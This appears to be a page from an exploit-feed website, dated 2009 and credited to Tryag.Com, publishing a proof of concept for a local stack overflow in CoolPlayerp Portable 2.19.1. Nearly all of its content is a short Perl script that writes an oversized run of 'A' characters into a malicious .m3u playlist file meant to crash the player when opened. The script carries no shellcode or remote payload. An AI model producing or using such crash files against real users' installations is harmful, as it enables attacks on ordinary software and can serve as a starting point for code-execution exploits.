No account yet?
Home » Exploits » CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC
CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC E-mail
Feeds - Exploits
Written by Tryag.Com   
Monday, 20 April 2009 22:16
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## 
#CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC
## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
 

Security Services by HSC